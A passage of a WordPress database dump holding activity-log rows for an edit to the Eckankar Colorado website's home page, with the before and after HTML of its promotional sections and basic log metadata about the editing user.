col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(236960,40274,'_user_id','2'),(236961,40274,'_user_login','S8zhaBda'),(236962,40274,'_user_email','nada@zipnadanot.org'),(236963,40274,'_server_remote_addr','76.130.120.x'),(236964,40274,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(236965,40275,'post_id','7160'),(236966,40275,'post_type','page'),(236967,40275,'post_title','Home'),(236968,40275,'post_prev_post_content','<!--?xml version=\"1.0\" standalone=\"no\"?-->\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -274px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(236959,40274,'_message_key','post_updated'),(236958,40274,'post_new_post_content','<!--?xml version=\"1.0\" standalone=\"no\"?-->\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -274px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 